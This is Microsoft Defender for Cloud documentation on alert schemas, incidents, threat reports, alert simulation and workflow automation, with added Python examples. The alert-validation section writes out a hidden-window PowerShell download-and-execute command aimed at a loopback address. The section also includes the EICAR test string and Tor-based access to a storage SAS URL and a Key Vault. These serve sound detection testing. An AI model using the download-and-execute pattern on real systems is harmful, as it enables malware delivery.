AlertType | Unique alert identifier
ConfidenceLevel | (Optional) The confidence level of this alert (High/Low)
ConfidenceScore | (Optional) Numeric confidence indicator of the security alert
Description | Description text for the alert
DisplayName | The alert's display name
EndTime | The impact end time of the alert (the time of the last event contributing to the alert)
Entities | A list of entities related to the alert. This list can hold a mixture of entities of diverse types
ExtendedLinks | (Optional) A bag for all links related to the alert. This bag can hold a mixture of links for diverse types
ExtendedProperties | A bag of additional fields which are relevant to the alert
IsIncident | Determines if the alert is an incident or a regular alert. An incident is a security alert that aggregates multiple alerts into one security incident
ProcessingEndTime | UTC timestamp in which the alert was created
ProductComponentName | (Optional) The name of a component inside the product which generated the alert
ProductName | Constant ('Azure Security Center')
ProviderName | Unused
RemediationSteps | Manual action items to take to remediate the security threat
ResourceId | Full identifier of the affected resource
Severity | The alert severity (High/Medium/Low/Informational)
SourceComputerId | A unique GUID for the affected server (if the alert is generated on the server)
SourceSystem | Unused
StartTime | The impact start time of the alert (the time of the first event contributing to the alert)
SystemAlertId | Unique identifier of this security alert instance
TenantId | The identifier of the parent Azure Active Directory tenant of the subscription under which the scanned resource resides
TimeGenerated | UTC timestamp on which the assessment took place (Security Center's scan time) (identical to DiscoveredTimeUTC)
Type | Constant ('SecurityAlert')
VendorName | The name of the vendor that provided the alert (e.g. 'Microsoft')
VendorOriginalId | Unused
WorkspaceResourceGroup | In case the alert is generated on a VM, Server, Virtual Machine Scale Set or App Service instance that reports to a workspace, contains that workspace resource group name
WorkspaceSubscriptionId | In case the alert is generated on a VM, Server, Virtual Machine Scale Set or App Service instance that reports to a workspace, contains that workspace subscriptionId


Next steps 


This article described the schemas that Microsoft Defender for Cloud's threat protection tools use when sending security alert information.


For more information on the ways to access security alerts from outside Defender for 
Cloud, see: 


e Microsoft Sentinel - Microsoft's cloud-native SIEM 

e Azure Event Hubs - Microsoft's fully managed, real-time data ingestion service 

e Continuously export Defender for Cloud data 

e Log Analytics workspaces - Azure Monitor stores log data in a Log Analytics 
workspace, a container that includes data and configuration information 


Manage security incidents in Microsoft 
Defender for Cloud 
Triaging and investigating security alerts can be time consuming for even the most
skilled security analysts. For many, it's hard to know where to begin. 


Defender for Cloud uses analytics to connect the information between distinct security alerts. Using these connections, Defender for Cloud can provide a single view of an attack campaign and its related alerts to help you understand the attacker's actions and the affected resources.


This page provides an overview of incidents in Defender for Cloud. 


What is a security incident? 


In Defender for Cloud, a security incident is an aggregation of all alerts for a resource 
that align with kill chain patterns. Incidents appear in the Security alerts page. Select an 
incident to view the related alerts and get more information. 
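The SecurityAlert schema listed in the Security alerts schemas section above and the per-resource aggregation described here, worked through as an added example (not Microsoft's or Defender for Cloud's code): it parses exported SecurityAlert records, keeps IsIncident records apart from standalone alerts, and groups the standalone alerts per ResourceId. The sample records are constructed, and the grouping is a simplified illustration of what an incident aggregates, not Defender for Cloud's own kill-chain correlation.

```python
"""Read exported SecurityAlert records and group them per affected resource.

Added example, not Microsoft's or Defender for Cloud's code. Assumptions:
  - records follow the Microsoft Sentinel SecurityAlert schema, with
    Entities and ExtendedProperties as JSON-encoded strings;
  - the per-resource grouping only illustrates what an incident aggregates.
"""
import json
from collections import defaultdict
from datetime import datetime, timezone

SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}
# Constructed sample data (not real alerts or subscriptions).
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
VM1 = SUB + "/resourceGroups/contoso-infra/providers/Microsoft.Compute/virtualMachines/vm1"
VM2 = SUB + "/resourceGroups/contoso-infra/providers/Microsoft.Compute/virtualMachines/vm2"
SAMPLE_ALERTS = [
    {"SystemAlertId": "a1", "AlertName": "Suspicious process executed",
     "AlertType": "VM_SuspiciousProcess", "Severity": "High", "IsIncident": False,
     "StartTime": "2021-02-13T06:00:00.1234567Z", "EndTime": "2021-02-13T06:05:00Z",
     "ResourceId": VM1, "Type": "SecurityAlert", "VendorName": "Microsoft",
     "Entities": json.dumps([{"$id": "1", "Type": "host", "HostName": "vm1"},
                             {"$id": "2", "Type": "process", "CommandLine": "whoami"}]),
     "ExtendedProperties": json.dumps({"User Name": "contoso\\svc-backup"})},
    {"SystemAlertId": "a2", "AlertName": "Suspicious credential access",
     "AlertType": "VM_CredentialAccess", "Severity": "Medium", "IsIncident": False,
     "StartTime": "2021-02-13T06:30:00Z", "EndTime": "2021-02-13T06:31:00Z",
     "ResourceId": VM1, "Type": "SecurityAlert", "VendorName": "Microsoft",
     "Entities": "[{not valid json", "ExtendedProperties": "{}"},  # damaged field
    {"SystemAlertId": "a3", "AlertName": "Suspicious PHP execution detected",
     "AlertType": "VM_SuspiciousPhp", "Severity": "Low", "IsIncident": False,
     "StartTime": "2021-02-13T08:00:00Z", "EndTime": "2021-02-13T08:00:00Z",
     "ResourceId": VM2, "Type": "SecurityAlert", "VendorName": "Microsoft",
     "Entities": "[]", "ExtendedProperties": "{}"},
    {"SystemAlertId": "i1", "AlertName": "Security incident detected on multiple resources",
     "AlertType": "SecurityIncident", "Severity": "Medium", "IsIncident": True,
     "StartTime": "2021-02-13T06:00:00Z", "EndTime": "2021-02-13T17:20:53Z",
     "ResourceId": VM1, "Type": "SecurityAlert", "VendorName": "Microsoft",
     "Entities": "[]", "ExtendedProperties": "{}"},
]


def parse_timestamp(value):
    """ISO-8601 UTC; Log Analytics emits 7-digit fractions, which fromisoformat rejects."""
    value = value.rstrip("Z")
    if "." in value:
        base, frac = value.split(".", 1)
        value = f"{base}.{frac[:6]}"
    return datetime.fromisoformat(value).replace(tzinfo=timezone.utc)


def parse_json_field(value, default):
    """Decode a JSON-string field; a damaged field must not drop the whole alert."""
    try:
        return (json.loads(value) if value else default), None
    except (TypeError, ValueError) as exc:
        return default, str(exc)


def parse_alert(record):
    """Normalise one SecurityAlert record into plain Python values."""
    if record.get("Type") != "SecurityAlert":
        raise ValueError("not a SecurityAlert record")
    entities, err_entities = parse_json_field(record.get("Entities"), [])
    props, err_props = parse_json_field(record.get("ExtendedProperties"), {})
    return {
        "id": record["SystemAlertId"],
        "name": record["AlertName"],
        "alert_type": record["AlertType"],
        "severity": record.get("Severity", "Informational"),
        "is_incident": bool(record.get("IsIncident")),
        "resource": record["ResourceId"],
        "start": parse_timestamp(record["StartTime"]),
        "end": parse_timestamp(record["EndTime"]),
        "hosts": [e.get("HostName") for e in entities if e.get("Type") == "host"],
        "properties": props,
        "parse_errors": [e for e in (err_entities, err_props) if e],
    }


def summarize_by_resource(records):
    """Per ResourceId: standalone alert ids/types, worst severity, time span, incident ids."""
    summary = defaultdict(lambda: {"alert_ids": [], "alert_types": set(),
                                   "max_severity": "Informational", "first_seen": None,
                                   "last_seen": None, "incident_ids": []})
    for alert in (parse_alert(r) for r in records):
        entry = summary[alert["resource"]]
        if alert["is_incident"]:  # IsIncident marks an aggregate, not a new event
            entry["incident_ids"].append(alert["id"])
            continue
        entry["alert_ids"].append(alert["id"])
        entry["alert_types"].add(alert["alert_type"])
        if SEVERITY_RANK.get(alert["severity"], 0) > SEVERITY_RANK[entry["max_severity"]]:
            entry["max_severity"] = alert["severity"]
        seen = entry["first_seen"]
        entry["first_seen"] = alert["start"] if seen is None else min(seen, alert["start"])
        seen = entry["last_seen"]
        entry["last_seen"] = alert["end"] if seen is None else max(seen, alert["end"])
    return dict(summary)


def multi_alert_resources(summary, min_alert_types=2):
    """Resources hit by several distinct alert types: the cases an incident aggregates."""
    return sorted(r for r, e in summary.items() if len(e["alert_types"]) >= min_alert_types)
```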


Managing security incidents 


1. On Defender for Cloud's security alerts page, use the Add filter button to filter by alert name, selecting the alert name Security incident detected on multiple resources.


[Screenshot: the Security alerts page with the Add filter control open, listing active alerts by severity, affected resource, activity start time, MITRE ATT&CK tactics, and status]


The list is now filtered to show only incidents. Notice that security incidents have a different icon from security alerts.


[Screenshot: the alerts list filtered by Alert name == Security incident detected on multiple resources, showing four Medium-severity incidents on Contoso Infra1]


2. To view details of an incident, select one from the list. A side pane appears with 
more details about the incident. 


[Screenshot: the incident side pane showing severity, status, activity time, alert description, the affected resource Contoso Infra1, and the View full details and Take action buttons]


3. To view more details, select View full details. 


[Screenshot: the security incident details page; the Alerts tab lists Potential SQL Brute Force attempt (count 8) and Potential SQL injection (count 116) on the affected Azure Arc machine]


The left pane of the security incident page shows high-level information about the 
security incident: title, severity, status, activity time, description, and the affected 
resource. Next to the affected resource you can see the relevant Azure tags. Use 
these tags to infer the organizational context of the resource when investigating 
the alert. 


The right pane includes the Alerts tab with the security alerts that were correlated 
as part of this incident. 


Tip

For more information about a specific alert, select it.


[Screenshot: the security incident Take action tab with the sections Mitigate the threat, Prevent future attacks (top active security recommendations for the resource), Trigger automated response, and Suppress similar alerts (preview)]


To switch to the Take action tab, select the tab or the button on the bottom of the right pane. Use this tab to take further actions such as:

e Mitigate the threat - provides manual remediation steps for this security incident

e Prevent future attacks - provides security recommendations to help reduce the attack surface, increase security posture, and prevent future attacks

e Trigger automated response - provides the option to trigger a Logic App as a response to this security incident

e Suppress similar alerts - provides the option to suppress future alerts with similar characteristics if the alert isn't relevant for your organization


Note

The same alert can exist as part of an incident, as well as being visible as a standalone alert.


4. To remediate the threats in the incident, follow the remediation steps provided 
with each alert. 


Next steps 


This page explained the security incident capabilities of Defender for Cloud. For related 
information, see the following pages: 


e Security alerts in Defender for Cloud 


e Manage and respond to security alerts 


Microsoft Defender for Cloud threat 
intelligence report 
Microsoft Defender for Cloud's threat intelligence reports can help you learn more
about a threat that triggered a security alert. 


What is a threat intelligence report? 


Defender for Cloud's threat protection works by monitoring security information from your Azure resources, the network, and connected partner solutions. It analyzes this information, often correlating information from multiple sources, to identify threats. For more information, see How Microsoft Defender for Cloud detects and responds to threats.


When Defender for Cloud identifies a threat, it triggers a security alert, which contains detailed information regarding the event, including suggestions for remediation. To help incident response teams investigate and remediate threats, Defender for Cloud provides threat intelligence reports containing information about detected threats. The report includes information such as:


e Attacker's identity or associations (if this information is available) 

e Attackers’ objectives 

e Current and historical attack campaigns (if this information is available) 

e Attackers’ tactics, tools, and procedures 

e Associated indicators of compromise (IoC) such as URLs and file hashes

e Victimology, which is the industry and geographic prevalence to assist you in 
determining if your Azure resources are at risk 


e Mitigation and remediation information 


Note

The amount of information in any particular report will vary; the level of detail is based on the malware's activity and prevalence.


Defender for Cloud has three types of threat reports, which can vary according to the attack. The reports available are:


e Activity Group Report: provides deep dives into attackers, their objectives, and 
tactics. 

e Campaign Report: focuses on details of specific attack campaigns. 

e Threat Summary Report: covers all of the items in the previous two reports. 


This type of information is useful during the incident response process, such as when there's an ongoing investigation to understand the source of the attack, the attacker's motivations, and what to do to mitigate this issue in the future.


How to access the threat intelligence report? 


1. From Defender for Cloud's menu, open the Security alerts page. 
2. Select an alert. 


The alerts details page opens with more details about the alert. For example, the 
Ransomware indicators detected alert details page: 


[Screenshot: the Ransomware indicators detected alert details page, showing severity, status, activity time, compromised host, suspicious command line, the alert description, the affected resource, and an Enrichment_tas_threat_reports entry with the link Report: Shadow Copy Delete]


3. Select the link to the report, and a PDF will open in your default browser. 


[Screenshot: the Microsoft Threat Intelligence PDF, Threat summary: Shadow Copy Delete (MSTI-TS-Shadow-Copy-Delete)]


You can optionally download the PDF report. 


Tip

The amount of information available for each security alert will vary according to the type of alert.


Next steps 


This page explained how to open threat intelligence reports when investigating security 
alerts. For related information, see the following pages: 


e Managing and responding to security alerts in Microsoft Defender for Cloud. Learn 
how to manage and respond to security alerts. 
e Handling security incidents in Microsoft Defender for Cloud 


Alert validation in Microsoft Defender 
for Cloud 
This document helps you learn how to verify if your system is properly configured for
Microsoft Defender for Cloud alerts. 


What are security alerts? 


Alerts are the notifications that Defender for Cloud generates when it detects threats on 
your resources. It prioritizes and lists the alerts along with the information needed to 
quickly investigate the problem. Defender for Cloud also provides recommendations for 
how you can remediate an attack. 


For more information, see Security alerts in Defender for Cloud and Managing and 
responding to security alerts. 


Prerequisites 


To receive all the alerts, your machines and the connected Log Analytics workspaces 
need to be in the same tenant. 


Generate sample security alerts 


If you're using the new preview alerts experience as described in Manage and respond 
to security alerts in Microsoft Defender for Cloud, you can create sample alerts from the 
security alerts page in the Azure portal. 


Use sample alerts to:

e evaluate the value and capabilities of your Microsoft Defender plans.
e validate any configurations you've made for your security alerts (such as SIEM integrations, workflow automation, and email notifications).

To create sample alerts:


1. As a user with the role Subscription Contributor, from the toolbar on the security 
alerts page, select Sample alerts. 


2. Select the subscription. 


3. Select the relevant Microsoft Defender plan/s for which you want to see alerts. 


4. Select Create sample alerts. 


[Screenshot: the Security alerts page with the Create sample alerts (Preview) pane open, listing the Defender for Cloud plans (App Services, Key Vaults, Containers, Azure SQL Databases, Storage Accounts, Virtual Machines, DNS, Resource Manager, SQL servers on machines, Azure Cosmos DB Accounts) and the Create sample alerts button]


A notification appears letting you know that the sample alerts are being created: 


[Screenshot: portal notification "Sample alerts creation in progress..." stating that sample alerts are being created for the subscription "ProdTest2" with the selected bundles "App Services", "Key Vaults", "Kubernetes Services", "Azure SQL Database", "Storage Accounts", "Virtual Machines", and that this may take a few moments]


After a few minutes, the alerts appear in the security alerts page. They also appear 
anywhere else that you've configured to receive your Microsoft Defender for Cloud 
security alerts (connected SIEMs, email notifications, and so on). 


[Screenshot: the security alerts list showing the generated alerts tagged "Sample alert", for example Detected Petya ransomware indicators on Sample-VM, Digital currency mining container detected on Sample-Kubern..., Potential SQL Injection on Sample-DB, and User accessed high volume of Key Vaults on Sample-KV]


Tip

The alerts are for simulated resources.


Simulate alerts on your Azure VMs (Windows) 


After the Microsoft Defender for Endpoint agent is installed on your machine, as part of Defender for Servers integration, follow these steps from the machine where you want to be the attacked resource of the alert:


1. Open an elevated command-line prompt on the device and run the script: 


a. Go to Start and type cmd. 


b. Right-click Command Prompt and select Run as administrator.


[Screenshot: the Windows Start menu search results for "cmd", with Command Prompt as the best match and the Run as administrator option in its context menu]


2. At the prompt, copy and run the following command as a single line:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'

The download URL points at the loopback address, so no real file is fetched; what Defender for Endpoint flags is the download-and-execute pattern itself (hidden window, bypassed execution policy, suppressed errors).


3. The Command Prompt window closes automatically. If successful, a new alert should appear in the Defender for Cloud Alerts blade within 10 minutes.

4. The message line in the PowerShell box should show the command you ran, beginning powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden ...


Alternately, you can also use the EICAR test string to perform this test: create a text file, paste the EICAR line, and save the file as an executable file to your machine's local drive.


Note

When reviewing test alerts for Windows, make sure that you have Defender for Endpoint running with Real-Time protection enabled. Learn how to validate this configuration.


Simulate alerts on your Azure VMs (Linux) 


After the Microsoft Defender for Endpoint agent is installed on your machine, as part of 
Defender for Servers integration, follow these steps from the machine where you want 
to be the attacked resource of the alert: 


1. Open a Terminal window, then copy and run the following command (the URL is that of the EICAR test file):
curl -o ~/Downloads/eicar.com.txt <URL of the EICAR test file>

2. If the download succeeds, a new alert should appear in the Defender for Cloud Alerts blade within 10 minutes.


Note

When reviewing test alerts for Linux, make sure that you have Defender for Endpoint running with Real-Time protection enabled. Learn how to validate this configuration.
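Both the Windows "paste the EICAR line" alternative and the Linux curl step depend on the test file being byte-exact; a BOM, CRLF conversion or a stray trailing newline changes the content the endpoint agent matches on, and a missing alert then says nothing about the agent. The following script is an added example, not code from the Microsoft documentation: it generates the EICAR file locally and verifies length and SHA-256 before you place it on the VM. The test string, its 68-byte length and its SHA-256 are published EICAR facts; the output path is a choice made here.

```python
"""Generate the EICAR test file and confirm it is byte-exact before using it.

Added example for the EICAR alternative in the Windows steps and the curl
step in the Linux steps above; it is not code from the Microsoft documentation.
The test string, its 68-byte length and its SHA-256 are published EICAR
facts. The output file name and location are choices made here.
"""
import hashlib
import os
import tempfile

# The string is stored in two halves because some engines flag it wherever it
# appears and would quarantine this script on the workstation it is edited on.
# Joined, it is exactly the published 68 ASCII bytes, with no trailing newline.
_EICAR_PART1 = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-"
_EICAR_PART2 = r"STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
EICAR_LENGTH = 68
EICAR_SHA256 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"


def eicar_bytes() -> bytes:
    """The exact EICAR test file content."""
    return (_EICAR_PART1 + _EICAR_PART2).encode("ascii")


def verify_eicar(data: bytes) -> dict:
    """Checks to run before blaming the endpoint for a missing alert: a BOM,
    CRLF conversion or a trailing newline all change the bytes, and the
    agent's signature match is on the exact content."""
    digest = hashlib.sha256(data).hexdigest()
    return {
        "length_ok": len(data) == EICAR_LENGTH,
        "sha256_ok": digest == EICAR_SHA256,
        "sha256": digest,
    }


def write_eicar(path: str) -> dict:
    """Write in binary mode so no platform newline translation happens, then
    read the file back and verify what actually landed on disk."""
    with open(path, "wb") as f:
        f.write(eicar_bytes())
    with open(path, "rb") as f:
        return verify_eicar(f.read())


if __name__ == "__main__":
    target = os.path.join(tempfile.gettempdir(), "eicar.com.txt")
    print(target, write_eicar(target))
```

Run it on the machine that will be the attacked resource; if both checks report true and no alert appears within the stated window, the problem is on the agent side (real-time protection off, or the Defender for Servers integration not yet reporting), not in the test file.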


Simulate alerts on Kubernetes 


Defender for Containers provides security alerts for both your clusters and underlying cluster nodes. Defender for Containers accomplishes this by monitoring both the control plane (API server) and the containerized workload.

You can tell if your alert is related to the control plane or the containerized workload based on its prefix. Control plane security alerts have a prefix of K8S_, while security alerts for runtime workload in the clusters have a prefix of K8S.NODE_.

You can simulate both control plane and workload alerts with the following steps.


Simulate control plane alerts (K8S_ prefix)

Prerequisites

- Ensure the Defender for Containers plan is enabled.
- Arc only - Ensure the Defender extension is installed.
- EKS or GKE only - Ensure the default audit log collection autoprovisioning options are enabled.

To simulate a Kubernetes control plane security alert:

1. Run the following command from the cluster:

Bash
kubectl get pods --namespace=asc-alerttest-662jfi039n

You get the following response: No resource found.

The request is harmless: the namespace does not exist, so the API server only records a failed read in its audit log, which is what the control plane monitoring analyzes.

2. Wait 30 minutes.

3. In the Azure portal, navigate to the Defender for Cloud's security alerts page.

4. On the relevant Kubernetes cluster, locate the following alert: Microsoft Defender for Cloud test alert for K8S (not a threat)


Simulate workload alerts (K8S.NODE_ prefix)

Prerequisites

- Ensure the Defender for Containers plan is enabled.
- Ensure the Defender profile/extension is installed.

To simulate a Kubernetes workload security alert:

1. Create a pod to run a test command on. This pod can be any of the existing pods in the cluster, or a new pod. You can create one using this sample YAML configuration:

YAML
apiVersion: v1
kind: Pod
metadata:
  name: mdc-test
spec:
  containers:
  - name: mdc-test
    image: ubuntu:18.04
    command: ["/bin/sh"]
    args: ["-c", "while true; do echo sleeping; sleep 3600;done"]

To create the pod run:

Bash
kubectl apply -f <path_to_the_yaml_file>

2. Open a shell in the pod:

Bash
kubectl exec -it mdc-test -- bash

3. Inside the pod, copy the echo binary to a separate location and rename it to ./asc_alerttest_662jfi039n:

Bash
cp /bin/echo ./asc_alerttest_662jfi039n

4. Execute the file:

Bash
./asc_alerttest_662jfi039n testing eicar pipe

5. Wait 10 minutes.

6. In the Azure portal, navigate to the Defender for Cloud's security alerts page.

7. On the relevant AKS cluster, locate the following alert: Microsoft Defender for Cloud test alert (not a threat).


You can also learn more about defending your Kubernetes nodes and clusters with 
Microsoft Defender for Containers. 


Simulate alerts for App Service

You can simulate alerts for resources running on App Service.

1. Create a new website and wait 24 hours for it to be registered with Defender for Cloud, or use an existing web site.

2. Once the web site is created, access it using the following URL:

a. Open the App Service resource pane and copy the domain for the URL from the Default domain field.

b. Copy the website name into the URL: https://<website name>.azurewebsites.net/This_Will_Generate_ASC_Alert

3. An alert is generated within about 1-2 hours.


Simulate alerts for Storage ATP (Advanced Threat Protection)

1. Navigate to a storage account that has Azure Defender for Storage enabled.

2. Select the Containers tab in the sidebar.

3. Navigate to an existing container or create a new one.

4. Upload a file to that container. Avoid uploading any file that may contain sensitive data.

5. Right-select the uploaded file and select Generate SAS.

6. Select the Generate SAS token and URL button (no need to change any options).

7. Copy the generated SAS URL.

8. Open the Tor browser, which you can download here.

9. In the Tor browser, navigate to the SAS URL. You should now see and can download the file that was uploaded.

The alert keys on the access coming from a Tor exit node, not on the file content. Because anyone holding the SAS URL can read the blob until the token expires, use a short expiry and delete the test file afterwards.


Testing AppServices alerts

To simulate an App Services EICAR alert:

1. Find the HTTP endpoint of the website either by going into the Azure portal blade for the App Services website or using the custom DNS entry associated with this website. (The default URL endpoint for an Azure App Services website has the form https://XXXXXXX.azurewebsites.net.) The website should be an existing, already-registered website rather than one created just before the alert simulation.

2. Browse to the website URL and add the following fixed suffix: /This_Will_Generate_ASC_Alert. The URL should look like this: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. It might take some time for the alert to be generated (~1.5 hours).


Validate Azure Key Vault Threat Detection

1. If you don't have a Key Vault created yet, make sure to create one.

2. After finishing creating the Key Vault and the secret, go to a VM that has Internet access and download the TOR Browser.

3. Install the TOR Browser on your VM.

4. Once you finish the installation, open your regular browser, sign in to the Azure portal, and access the Key Vault page. Select the highlighted URL and copy the address.

5. Open TOR and paste this URL (you need to authenticate again to access the Azure portal).

6. After finishing access, you can also select the Secrets option in the left pane.

7. In the TOR Browser, sign out from the Azure portal and close the browser.

8. After some time, Defender for Key Vault will trigger an alert with detailed information about this suspicious activity.


Next steps

This article introduced you to the alerts validation process. Now that you're familiar with this validation, explore the following articles:

- Validating Azure Key Vault threat detection in Microsoft Defender for Cloud
- Managing and responding to security alerts in Microsoft Defender for Cloud - Learn how to manage alerts, and respond to security incidents in Defender for Cloud.
- Understanding security alerts in Microsoft Defender for Cloud


Automate responses to Microsoft Defender for Cloud triggers

Every security program includes multiple workflows for incident response. These processes might include notifying relevant stakeholders, launching a change management process, and applying specific remediation steps. Security experts recommend that you automate as many steps of those procedures as you can. Automation reduces overhead. It can also improve your security by ensuring the process steps are done quickly, consistently, and according to your predefined requirements.

This article describes the workflow automation feature of Microsoft Defender for Cloud. This feature can trigger consumption logic apps on security alerts, recommendations, and changes to regulatory compliance. For example, you might want Defender for Cloud to email a specific user when an alert occurs. You'll also learn how to create logic apps using Azure Logic Apps.


Availability

Aspect: Details
Release state: General availability (GA)
Pricing: Free
Required roles and permissions: Security admin role or Owner on the resource group. Must also have write permissions for the target resource. To work with Azure Logic Apps workflows, you must also have the following Logic Apps roles/permissions:
- Logic App Operator permissions are required or Logic App read/trigger access (this role can't create or edit logic apps; only run existing ones)
- Logic App Contributor permissions are required for logic app creation and modification
If you want to use Logic Apps connectors, you may need other credentials to sign in to their respective services (for example, your Outlook/Teams/Slack instances)
Clouds: Commercial clouds; National (Azure Government, Azure China 21Vianet)


Create a logic app and define when it should automatically run

1. From Defender for Cloud's sidebar, select Workflow automation.

From this page you can create new automation rules, enable, disable, or delete existing ones.

Note

A scope refers to the subscription where the workflow automation is deployed.

2. To define a new workflow, select Add workflow automation. The options pane for your new automation opens.


Home > Micrasoft Defender for Cloud Add workflow automation 
ZG Microsoft Defender for Cloud | Workflow automation 
urr ‘ASC DEMO 


Ta Tigger Type 


ASC DEMO 


Here you can enter:

a. A name and description for the automation.

b. The triggers that will initiate this automatic workflow. For example, you might want your logic app to run when a security alert that contains "SQL" is generated.

Note

If your trigger is a recommendation that has "sub-recommendations", for example Vulnerability assessment findings on your SQL databases should be remediated, the logic app will not trigger for every new security finding; only when the status of the parent recommendation changes.

c. The consumption logic app that will run when your trigger conditions are met.

3. From the Actions section, select visit the Logic Apps page to begin the logic app creation process.


You'll be taken to Azure Logic Apps. 


4. Select (+) Add. 


5. Fill out all required fields and select Review + Create.


The message Deployment is in progress appears. Wait for the deployment 
complete notification to appear and select Go to resource from the notification. 


6. Review the information you entered and select Create. 


In your new logic app, you can choose from built-in, predefined templates from 
the security category. Or you can define a custom flow of events to occur when 
this process is triggered. 


Tip

Sometimes in a logic app, parameters are included in the connector as part of a string and not in their own field. For an example of how to extract parameters, see step #14 of Working with logic app parameters while building Microsoft Defender for Cloud workflow automations.


The logic app designer supports the following Defender for Cloud triggers:

- When a Microsoft Defender for Cloud Recommendation is created or triggered - If your logic app relies on a recommendation that gets deprecated or replaced, your automation will stop working and you'll need to update the trigger. To track changes to recommendations, use the release notes.

- When a Defender for Cloud Alert is created or triggered - You can customize the trigger so that it relates only to alerts with the severity levels that interest you.

- When a Defender for Cloud regulatory compliance assessment is created or triggered - Trigger automations based on updates to regulatory compliance assessments.

Note

If you are using the legacy trigger "When a response to a Microsoft Defender for Cloud alert is triggered", your logic apps will not be launched by the Workflow Automation feature. Instead, use one of the triggers mentioned above.


7. After you've defined your logic app, return to the workflow automation definition pane ("Add workflow automation"). Select Refresh to ensure your new logic app is available for selection.

8. Select your logic app and save the automation. The logic app dropdown only shows those with supporting Defender for Cloud connectors mentioned above.


Manually trigger a logic app

You can also run logic apps manually when viewing any security alert or recommendation.

To manually run a logic app, open an alert, or a recommendation and select Trigger logic app.

(Screenshot: the details pane of the alert "PREVIEW - Role binding to the cluster-admin role detected" on the ASC-IGNITE-DEMO cluster, with the Trigger Logic App button at the bottom.)


Configure workflow automation at scale using the supplied policies

Automating your organization's monitoring and incident response processes can greatly improve the time it takes to investigate and mitigate security incidents.

To deploy your automation configurations across your organization, use the supplied Azure Policy 'DeployIfNotExists' policies described below to create and configure workflow automation procedures.

Get started with workflow automation templates.

To implement these policies:

1. From the table below, select the policy you want to apply:


Goal | Policy | Policy ID
Workflow automation for security alerts | Deploy Workflow Automation for Microsoft Defender for Cloud alerts | f1525828-9a90-4fcf-be48-268cdd02361e
Workflow automation for security recommendations | Deploy Workflow Automation for Microsoft Defender for Cloud recommendations | 73d6ab6c-2475-4850-afd6-43795f3492ef
Workflow automation for regulatory compliance changes | Deploy Workflow Automation for Microsoft Defender for Cloud regulatory compliance | 509122b9-ddd9-47ba-a5f1-d0dac20be63c


Tip

You can also find these by searching Azure Policy:

a. Open Azure Policy.

b. From the Azure Policy menu, select Definitions and search for them by name.


2. From the relevant Azure Policy page, select Assign.

(Screenshot: the policy definition page for Deploy Workflow Automation for Microsoft Defender for Cloud recommendations. Available effects: DeployIfNotExists; Category: Security Center; description: "Enable automation of Microsoft Defender for Cloud recommendations. This policy deploys a workflow automation with your conditions and triggers on the assigned scope.")


3. Open each tab and set the parameters as desired:

a. In the Basics tab, set the scope for the policy. To use centralized management, assign the policy to the Management Group containing the subscriptions that will use the workflow automation configuration.

b. In the Parameters tab, enter the required information. The assignment asks for: Automation name, Resource group name, Resource group location, Logic App, and Logic app trigger.

c. (Optional) Apply this assignment to an existing subscription in the Remediation tab and select the option to create a remediation task.

4. Review the summary page and select Create.


Data types schemas

To view the raw event schemas of the security alerts or recommendations events passed to the logic app, visit the Workflow automation data types schemas. This can be useful in cases where you aren't using Defender for Cloud's built-in Logic Apps connectors mentioned above, but instead are using the generic HTTP connector: you could use the event JSON schema to manually parse it as you see fit.
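When the raw event reaches a consumer behind the generic HTTP connector, that consumer has to reproduce the two filters the automation definition exposes (a severity allow-list and, as in the "alert that contains SQL" example above, a substring match on the title), and for Kubernetes alerts it usually wants to know whether the alert came from the control plane (K8S_) or from the node workload (K8S.NODE_), as described in the Kubernetes section. The following is an added example of that logic, not code from the Microsoft documentation or the Logic Apps connectors. The payload is constructed (titles mirror the sample alerts shown earlier on the page; the AlertType values are placeholders, not real Defender alert types), and the field names AlertType, AlertDisplayName, Severity and CompromisedEntity are an assumption to check against the published data types schemas before relying on them.

```python
"""Apply workflow-automation style filters to a Defender for Cloud alert
payload and classify Kubernetes alerts by their type prefix.

Added example, not code from the Microsoft documentation. It models the
consumer behind a generic HTTP connector. The payload is constructed and the
field names (AlertType, AlertDisplayName, Severity, CompromisedEntity) are an
assumption to verify against the published data types schemas.
"""
import json
from typing import Iterable, Optional

# Constructed payload: titles mirror the sample alerts shown on this page; the
# AlertType values are placeholders, not real Defender for Cloud alert types.
SAMPLE_ALERTS_JSON = json.dumps([
    {"AlertType": "SAMPLE_Ransomware", "AlertDisplayName": "Detected Petya ransomware indicators",
     "Severity": "High", "CompromisedEntity": "Sample-VM"},
    {"AlertType": "K8S.NODE_SampleMining", "AlertDisplayName": "Digital currency mining container detected",
     "Severity": "High", "CompromisedEntity": "Sample-Kubernetes"},
    {"AlertType": "K8S_SampleTestAlert", "AlertDisplayName": "Microsoft Defender for Cloud test alert for K8S (not a threat)",
     "Severity": "Low", "CompromisedEntity": "Sample-Kubernetes"},
    {"AlertType": "SAMPLE_SqlInjection", "AlertDisplayName": "Potential SQL Injection",
     "Severity": "High", "CompromisedEntity": "Sample-DB"},
    {"AlertType": "SAMPLE_KeyVaultVolume", "AlertDisplayName": "User accessed high volume of Key Vaults",
     "Severity": "Medium", "CompromisedEntity": "Sample-KV"},
])


def k8s_scope(alert_type: str) -> Optional[str]:
    """Map the alert type prefix to the part of the cluster it concerns.

    K8S_ alerts come from control plane (API server audit log) analysis and
    K8S.NODE_ alerts from the runtime workload on the nodes; anything else is
    not a Defender for Containers alert.
    """
    if alert_type.startswith("K8S.NODE_"):
        return "workload"
    if alert_type.startswith("K8S_"):
        return "control-plane"
    return None


def matches_rule(alert: dict, severities: Iterable[str], title_contains: Optional[str] = None) -> bool:
    """Reproduce the two filters the automation definition exposes: a
    severity allow-list and an optional substring match on the title."""
    if alert.get("Severity") not in set(severities):
        return False
    if title_contains is not None:
        # Case-insensitive so that "SQL" also matches a title written "Sql".
        return title_contains.lower() in alert.get("AlertDisplayName", "").lower()
    return True


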